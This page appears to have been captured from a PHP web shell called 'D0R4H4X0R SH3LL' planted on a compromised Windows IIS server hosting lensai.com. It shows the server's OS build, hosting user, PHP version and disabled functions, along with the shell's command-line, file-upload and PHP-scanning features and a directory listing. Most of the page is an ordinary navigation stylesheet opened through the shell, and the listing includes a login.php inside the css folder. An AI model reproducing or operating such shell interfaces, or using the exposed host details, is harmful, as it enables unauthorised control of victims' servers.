D0R4H4X0R SH3LL

Server Information

Server: Microsoft-IIS/10.0
System: Windows NT BH-PLESK-WEB3 10.0 build 20348 (Windows Server 2022) AMD64
User: IWPD_8556(lensai) ( 0 )
PHP Version: 8.3.21
Python Version: Python is not available
Disabled Functions:, Cron, Curl, Ftp, GCC, Mail, Mysql, PKEXEC, Perl, Python, SendMail, Ssh, Wget, exec, passthru, shell_exec, system

Features

Command Line

Find Longest Directory Path

Scan New PHP Files

Upload File

Directory: D:/INETPUB/VHOSTS/lensai.com/httpdocs/css/

Current File : D:/INETPUB/VHOSTS/lensai.com/httpdocs/css/nav.css

/*-- header --*/
.header_top{
	padding:.5em 0;
	background:#f5f5f5;
	border-top: 1px dotted #DADADA;
    border-bottom: 1px dotted #C3C3C3;
}
.header_top_left{
	float:left;
}
.header_top_left ul li{
	display:inline-block;
	color:#999;
	font-size:14px;
}
.header_top_left ul li a{
	color:#999;
	text-decoration:none;
}
.header_top_left ul li a:hover{
	color:#999;
}

.header_top_right{
	float:right;
}
.header_top_right p{
	font-size:14px;
	color:#999;
	margin:0;
	line-height:1.8em;
	text-transform:capitalize;
}

.logo{
	float:left;
	padding:10px;
	margin-right:10px;
	
}
.social-image{
	right:0px;   
	margin-top:20px;
	z-index:5;
	position:fixed;
	margin-right:5px;
}
.social-image a{
	float:none;
}
.social-image a img{
	padding:5px;
}
/*.social_icons{
	z-index:10;
	display:block;
	margin-top:70px;
	
	position:fixed;
}
.social_icons ul{
	list-style-type:none;
	padding:10px;
}
.social_icons ul li{
	float:none;
	padding:8px;
	margin:0 auto;
	
}
.social_icons ul li a{
	
	height:35px;
	color:#fff;
	width:120px;
	line-height:35px;
	margin:0 auto;
	background-color:#000;
	text-decoration:none;
	
}
.social_icons ul li a i{
	padding:5px;
}
.social_icons ul li a .fa{
	color:#fff;	
}
.social_icons ul li a .fa-facebook:hover{
	color:#00F;	
}
.social_icons ul li a .fa-twitter:hover{
	color:#0CF;	
}
.social_icons ul li a .fa-youtube:hover{
	color:#F00;	
}
.social_icons ul li a .fa-linkedin:hover{
	color:#33F;	
}*/
/*-- //social-icons --*/
.header {
    background-color: #f8f8f8;
    border-top: 1px dotted#e7e7e7;
}
.navbar-default {
	width:86%;
	margin:auto;
    background: none;
    border: none;
}
.navbar {
    margin-bottom: 0;
}
.navbar-default .navbar-collapse, .navbar-default .navbar-form {
    border: none;
}
.navbar-collapse {
    padding: 0;
	
}

.navbar-nav > li > a {
    padding: 20px 28px;
    font-size: 12px;
	line-height:40px!important;
    color: #777;
    text-transform: uppercase;
    
}
.navbar-nav > li > a.active{
	color:#000 !important;}

.navbar-default .navbar-nav > a, .navbar-default .navbar-nav >  a:hover{
    color: #000!important;
    background-color:#37D2C3;
    border-left: 1px dotted #e7e7e7;
}
.navbar-default .navbar-nav > a:active{
	color:#000 !important;	
}

/* Bounce To Bottom */
.hvr-bounce-to-bottom {
  display: inline-block;
  vertical-align: middle;
  -webkit-transform: translateZ(0);
  transform: translateZ(0);
  box-shadow: 0 0 1px rgba(0, 0, 0, 0);
  -webkit-backface-visibility: hidden;
  backface-visibility: hidden;
  -moz-osx-font-smoothing: grayscale;
  position: relative;
  -webkit-transition-property: color;
  transition-property: color;
  -webkit-transition-duration: 0.5s;
  transition-duration: 0.5s;
}
.hvr-bounce-to-bottom:before {
  content: "";
  position: absolute;
  z-index: -1;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  -webkit-transform: scaleY(0);
  transform: scaleY(0);
  -webkit-transform-origin: 50% 0;
  transform-origin: 50% 0;
  -webkit-transition-property: transform;
  transition-property: transform;
  -webkit-transition-duration: 0.5s;
  transition-duration: 0.5s;
  -webkit-transition-timing-function: ease-out;
  transition-timing-function: ease-out;
}
.m1:before {
	background: url(../images/img-sp.png) no-repeat 200px -127px #37D2C3 !important;
    border-radius: 20px;
}
.hvr-bounce-to-bottom:hover, .hvr-bounce-to-bottom:focus, .hvr-bounce-to-bottom:active {
  color: white;
}
.hvr-bounce-to-bottom:hover:before, .hvr-bounce-to-bottom:focus:before, .hvr-bounce-to-bottom:active:before {
  -webkit-transform: scaleY(1);
  transform: scaleY(1);
  -webkit-transition-timing-function: cubic-bezier(0.52, 1.64, 0.37, 0.66);
  transition-timing-function: cubic-bezier(0.52, 1.64, 0.37, 0.66);
}


/*-- //header --*/
@media (max-width:980px){
	.navbar-default .navbar-nav > li > a{
		font-size:9px;	
	}
}
@media (max-width:800px){
	.navbar-default .navbar-nav > li > a{
		font-size:9px;	
	}
}
@media (max-width:768px){
	.navbar-default .navbar-nav > li > a{
		font-size:9px;	
	}
	.navbar-default{
	width:96%;	
	}
}
@media (max-width:640px){
	.navbar-default .navbar-nav > li > a{
		font-size:12px;	
	}
}
@media (max-width:480px){
	.navbar-default .navbar-nav > li > a{
		font-size:12px;	
	}
	.navbar-default .navbar-nav > a, .navbar-default .navbar-nav >  a:hover, .navbar-default .navbar-nav >  a:focus {
    color: #fff!important;
    
	}
}
@media screen and (width: 320px){
	.navbar-default .navbar-nav > li > a{
		font-size:12px;	
	}
	.navbar-default .navbar-nav > a, .navbar-default .navbar-nav >  a:hover, .navbar-default .navbar-nav >  a:focus {
    color: #fff!important;
    
	}
	.caption span {
		margin: 0 0 1.5em;
	}
	.grid_4 {
		margin-top: 18px;
	}
	h3.title {
		font-size: 1.6em;
	}
	.alert, p,ol.breadcrumb li, .grid_3 p,.well, ul.list-group li, li.list-group-item1,a.list-group-item {
		font-size: 13px;
	}
	.alert {
		padding: 10px;
		margin-bottom: 10px;
	}
	ul.pagination li a {
		font-size: 14px;
		padding: 5px 11px;
	}
	.list-group {
		margin-bottom: 10px;
	}
	.well {
		padding: 10px;
	}
	.nav > li > a {
		font-size: 14px;
	}
	table.table.table-striped,.table-bordered,.bs-docs-example {
		display: none;
	}
}
/*--//Typography --*/



/*-----start-responsive-design------*/
@media (max-width:1920px){
	.social-image{
	right:0px;   
	margin-top:20px;
	z-index:5;
	position:fixed;
	margin-right:5px;
}
}
@media (max-width:1280px){
	
	.social-image{
	right:0px;   
	margin-top:20px;
	z-index:5;
	position:fixed;
	margin-right:5px;
}
}
@media (max-width:1024px){
	
	.logo h1 a {
		font-size: 1.2em;
	}
	.social-image{
	right:0px;   
	margin-top:20px;
	z-index:5;
	position:fixed;
	margin-right:5px;
}
.navbar-default{
	width:95%;	
}
}
@media (max-width:980px){
	.navbar-nav > li > a {
		padding: 20px 15px;
	}
	.social-image{
	right:0px;   
	margin-top:20px;
	z-index:5;
	position:fixed;
	margin-right:5px;
}
}
@media (max-width:800px){
	p.est:before {
		left: 36.5%;
	}
	.social-image{
	right:0px;   
	margin-top:20px;
	z-index:5;
	position:fixed;
	margin-right:5px;
}
}

@media screen and (max-width: 768px){
	.social-image{
	right:0px;   
	margin-top:20px;
	z-index:5;
	position:fixed;
	margin-right:5px;
}
	
	.navbar-default .navbar-toggle {
		border-color: #D62242;
		
	}
	.navbar-default{
	width:96%;	
	}
	.navbar-default .navbar-toggle:hover, .navbar-default .navbar-toggle:focus {
		color:#fff;
	}
	.navbar-default .navbar-toggle .icon-bar {
		background-color: #fff;
	}
	.navbar-nav > li > a {
		padding: 10px 0;
		text-align: center;
	}
	.navbar-default .navbar-nav > .active > a, .navbar-default .navbar-nav > .active > a:hover, .navbar-default .navbar-nav > .active > a:focus {
		color:#fff;
	}
	.hvr-bounce-to-bottom:before {
		
	}
	.navbar-nav {
		margin: 0;
		
		
	}
	
}

@media only screen and (max-device-width: 640px) {	
	.logo {
		width: 50%;
		
	}
	.logo h1 a img {
		width: 100%;
	}
	.navbar-toggle {
		margin-right: 0;
	}
	.social-image{
	right:0px;   
	margin-top:20px;
	z-index:5;
	position:fixed;
	margin-right:5px;
}
	.social-image a{
		float:none;
	}
	.social-image a img{
		padding:5px;
	}
}


@media only screen and (max-device-width: 480px) {
	.logo h1 a {
		font-size: 1em;
	}
	.navbar-toggle {
		margin-right: 0;
	}
	.header_top_right p,.header_top_left ul li {
		font-size: 13px;
	}
	.header_top_left,.header_top_right{
		float:none;
		text-align:center;
	}
	.logo {
		width: 50%;
		
	}
	.logo h1 a img {
		width: 100%;
	}
	.logo h1 a {
		font-size: .8em;
	}
	.social-image{
	right:0px;   
	margin-top:20px;
	z-index:5;
	position:fixed;
	margin-right:5px;
}
	.social-image a{
		float:none;
	}
	.social-image a img{
		padding:5px;
	}
	
	
}


@media only screen and (max-device-width: 320px) {
	.logo h1 a {
		font-size: .57em;
	}
	.logo {
		width: 60%;
		float: none;
		margin-top:-8px ;
		
	}
	.social-image{
	right:0px;   
	margin-top:20px;
	z-index:5;
	position:fixed;
	margin-right:5px;
}
	.social-image a{
		float:none;
	}
	.social-image a img{
		padding:5px;
	}
}
animate.css 1.646 KB
File -rw-rw-rw-
bootstrap.css 142.483 KB
File -rw-rw-rw-
bootstrap.min.css 109.279 KB
File -rw-rw-rw-
clndr.css 9.838 KB
File -rw-rw-rw-
colorbox.css 3.415 KB
File -rw-rw-rw-
custom.css 1.713 KB
File -rw-rw-rw-
elastislide.css 3.641 KB
File -rw-rw-rw-
font-awesome.css 21.661 KB
File -rw-rw-rw-
File -rw-rw-rw-
jqvmap.css 1.107 KB
File -rw-rw-rw-
login.php 0.582 KB
File -rw-rw-rw-
magnific-popup.css 11.169 KB
File -rw-rw-rw-
nav.css 7.740 KB
File -rw-rw-rw-
patros.css 36.124 KB
File -rw-rw-rw-
slider.css 15.618 KB
File -rw-rw-rw-
style.css 62.850 KB
File -rw-rw-rw-
test.html 0.006 KB
File -rw-rw-rw-
D0R4H4X0R SH3LL